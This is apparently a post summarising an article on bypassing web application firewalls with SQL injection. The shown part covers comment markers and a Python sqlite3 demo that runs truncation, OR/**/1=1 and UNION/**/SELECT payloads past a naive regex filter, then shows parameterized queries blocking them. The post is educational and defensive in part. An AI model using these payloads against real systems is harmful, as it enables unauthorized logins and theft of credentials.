Great article; the source is at the bottom of this post.
1) Comments: SQL comments are a blessing to SQL injectors. They let us bypass many of the restrictions imposed by Web application firewalls, and they let us truncate the legitimate query so that the attacker's injected statement executes while the remainder of the original SQL is commented out. Some comments in SQL:
//, --, /**/, #, --+, -- -, ;

Support varies by database. In MySQL, # is a line comment and -- is only a comment when followed by whitespace, which is why --+ and -- - appear in URL-encoded payloads (the + decodes to a space, the extra - simply pads the line). The /**/ inline comment is understood by nearly every engine and can stand in for a space between keywords, which defeats filters that key on whitespace. The final entry, ;, is not a comment at all: it terminates a statement so another can be stacked after it, where the driver allows multiple statements.
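The following is an added example, not code from the original article: a Python script using the standard-library sqlite3 module to show both uses of comments described above. A deliberately naive, hypothetical WAF rule keys on "UNION SELECT" and "OR 1=1" separated by whitespace; the sample users table and payloads are constructed for this illustration. The vulnerable login concatenates user input into SQL, so a trailing -- - comment discards the password check and /**/ hides the keyword pairs from the rule; the parameterized version is unaffected by the same input.

```python
import re
import sqlite3

# Constructed sample data for this example (not from the original article).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users(username, password, role) VALUES ('alice', 's3cret', 'admin');
        INSERT INTO users(username, password, role) VALUES ('bob', 'hunter2', 'user');
    """)
    return conn

# Hypothetical, deliberately naive WAF rule: it only recognises the keyword
# pairs when they are separated by ordinary whitespace characters.
NAIVE_WAF = re.compile(r"union\s+select|or\s+1\s*=\s*1", re.IGNORECASE)

def waf_blocks(payload: str) -> bool:
    return NAIVE_WAF.search(payload) is not None

def vulnerable_login(conn, username: str, password: str):
    # String concatenation: everything after an injected comment marker is
    # ignored by the SQL parser, so the AND password = ... clause vanishes.
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchall()

def safe_login(conn, username: str, password: str):
    # Bound parameters: the comment characters stay inside a string value and
    # never reach the parser as syntax.
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()

# Payloads using comments in the two ways the text describes. The "-- -" form
# is used because MySQL needs whitespace after "--"; SQLite accepts it too.
TRUNCATE = "alice' -- -"                       # comment out the password check
BLOCKED = "' OR 1=1 -- -"                      # caught by the naive rule
OR_INLINE = "' OR/**/1=1 -- -"                 # /**/ replaces the expected space
UNION_INLINE = "' UNION/**/SELECT username, password FROM users -- -"

if __name__ == "__main__":
    db = make_db()
    for p in (TRUNCATE, BLOCKED, OR_INLINE, UNION_INLINE):
        blocked = waf_blocks(p)
        print(repr(p), "blocked" if blocked else "passed",
              "-" if blocked else vulnerable_login(db, p, "wrong"),
              safe_login(db, p, "wrong"))
```

Running it shows the truncation payload logging in as alice with a wrong password, the inline-comment variants slipping past the rule while still returning every row (or every credential, via the UNION), and the parameterized query returning nothing for all of them. Regex-based keyword filters are the wrong layer for this defence; parameterization removes the parser from the attacker's reach.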
2) Case Changing: